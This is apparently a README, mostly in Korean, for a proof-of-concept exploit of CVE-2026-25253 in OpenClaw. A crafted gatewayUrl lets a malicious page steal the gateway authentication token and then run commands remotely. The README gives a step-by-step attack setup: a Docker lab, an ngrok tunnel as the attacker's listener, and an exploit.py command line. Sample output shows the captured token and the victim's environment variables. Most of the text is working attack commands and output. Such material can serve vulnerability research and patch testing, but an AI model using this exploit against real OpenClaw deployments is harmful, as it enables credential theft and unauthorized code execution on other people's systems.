
OpenClaw Authentication Token Exfiltration
★ CVE-2026-25253 OpenClaw 1-Click Remote Code Execution PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : OpenClaw 인증 토큰 유출 취약점
설명: OpenClaw(일명 clawdbot 또는 Moltbot) v2026.1.29 이전 버전에서 공격자가 조작된 gatewayUrl 쿼리 문자열 값을 Control UI에 제공하여 저장된 게이트웨이 인증 토큰을 유출할 수 있습니다. 이는 검증이나 사용자 확인 없이 자동으로 WebSocket 연결을 설정합니다. 이로 인해 승인되지 않은 게이트웨이 접근과 원클릭 원격 코드 실행이 발생할 수 있습니다.
Dockerfile — OpenClaw 취약 환경 구축templates/ — 익스플로잇에 사용되는 악성 웹 페이지config.txt — 피해자 환경에서 사용되는 OpenClaw 설정exploit.py — 익스플로잇 서버requirements.txt — PoC 종속성docker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 입력config.txt의 내용 붙여넣기pip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
예시:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
저희는 매월 CVE 및 악성코드 분석을 발행합니다. 관심이 있으시면 아래 링크를 통해 저희 발행물을 확인해 주세요.